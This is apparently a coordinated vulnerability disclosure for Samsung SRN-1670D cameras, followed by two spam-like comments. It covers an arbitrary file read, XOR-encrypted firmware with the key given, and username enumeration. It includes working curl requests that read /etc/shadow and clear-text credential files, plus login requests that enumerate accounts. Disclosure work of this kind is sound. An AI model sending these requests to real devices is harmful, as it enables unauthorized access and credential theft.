Multiple vulnerabilities in Samsung SRN cameras

Authors: Luca Giancane, Aristide Fattori (@joystick) and Roberto Paleari (@rpaleari)

We identified multiple security vulnerabilities that affect Samsung SRN cameras. These issues permit a remote, unauthenticated attackers to gain full control over the device. We thank the CMU CERT for having coordinated the disclosure process.

In detail, we identified three different security issues, described in the following sections.

Arbitrary file read (CVE-2015-8279)


Attackers can exploit an undocumented PHP page to read arbitrary local files. Exploitation is trivial, as the attacker can simply provide the name of the requested file in a GET parameter.

As an example, to read the local /etc/shadow file the following request must be performed:

$ curl -v http://<target IP>/cslog_export.php?path=/etc/shadow

This vulnerability can be exploited to read a local file which stores web interface credentials. In our test devices such file is stored at /root/php_modules/lighttpd/sbin/userpw, and contains both the usernames and passwords in clear-text form, so no brute forcing is required.

Weak firmware encryption (CVE-2015-8281)

The device vendor permits customers to download an updated version of the
device software from its own web portal. However, firmware images are encrypted using a proprietary scheme.

As an example, the initial bytes of the mproject_add_header.dtb file (which
is contained in the downloadable firmware archive) includes an header (EncryptFileFormat) that testifies the file is actually encrypted

$ xxd mproject_add_header.dtb  | head
00000000: 456e 6372 7970 7446 696c 6546 6f72 6d61  EncryptFileForma
00000010: 740a cdbb 53bd 4e6f 903e 7869 1af3 c98d  t...S.No.>xi....


However, looking at the file tail we observe a recurring byte pattern:

$ xxd mproject_add_header.dtb  | tail
000026e0: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
000026f0: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002700: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002710: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002720: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002730: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
...


Considering the file is encrypted and assuming the vendor used a standard encryption scheme, few algorithms generate such a recurring pattern. The most obvious hypothesis is a XOR encryption.

As the file tail is usually padded with zeroes, we speculated the file has been XOR-encrypted using a 16-byte key equal to e854 1db6 ad50 4e6f b70e 7869 1acb c98d. We tried using this key to decode the file and successfully decrypted the firmware:

$ python ../decrypt.py mproject_add_header.dtb  | xxd | head
00000000: 9c5e d00d feed 0000 2730 0000 0038 0000  .^......'0...8..
00000010: 20b0 0000 0028 0000 0011 0000 0010 0000   ....(..........
00000020: 0000 0000 0280 0000 2078 0000 0000 0000  ........ x......
00000030: 0000 0000 0000 0000 0000 0000 0001 0000  ................
00000040: 0000 0000 0003 0000 000e 0000 0000 6673  ..............fs
00000050: 6c2c 6d70 6338 3533 3664 7300 0000 0000  l,mpc8536ds.....
00000060: 0003 0000 000e 0000 0006 6673 6c2c 6d70  ..........fsl,mp
00000070: 6338 3533 3664 7300 0000 0000 0003 0000  c8536ds.........
00000080: 0004 0000 0011 0000 0002 0000 0003 0000  ................
00000090: 0004 0000 0020 0000 0002 0000 0001 616c  ..... ........al


The very same XOR key can be used to decrypt also the other components of the device firmware. One of these elements contains an ext2 filesystem, with the contents of the device main partition.

User enumeration (CVE-2015-8280)


Remote attackers can enumerate valid web interface usernames by providing an invalid password and looking at the returned error message.

As an example, when an invalid username is provided the `Wrong ID` message is returned, as shown in the following request:

$ curl -d "data1=$(echo -n invalid | base64)&data2=x" http://<target IP>/login
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'/>
<script type='text/javascript' language='javascript'>
    alert("Wrong ID");
    top.location.href="./index.html";

However, when a valid username is provided, the `Wrong Password` message is returned, testifying that the username is valid:

$ curl -d "data1=$(echo -n admin | base64)&data2=x" http://<target IP>/login
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'/>
<script type='text/javascript' language='javascript'>
    alert("Wrong Password");
    top.location.href="./index.html";


Affected models

We confirm the following device models are affected:
  • Samsung SRN-1670D (Web Viewer Version 1,0,0,193, Date Created 2013.10.26)
Other similar device models and software versions may also be affected, but they were not tested.

3 comments:

  1. Thank you for the article.
    How many times I've heard about digital systems' vulnerabilities. This case proves that there is no fully secured system yet. The only system I used to try and had a great result was virtual data room free trial service for business deals safety.

    ReplyDelete
  2. When thinking about cloud security, it's ultimately up to each individual organization and its leadership to determine if a cloud deployment is the right strategy.
    virtual data rooms

    ReplyDelete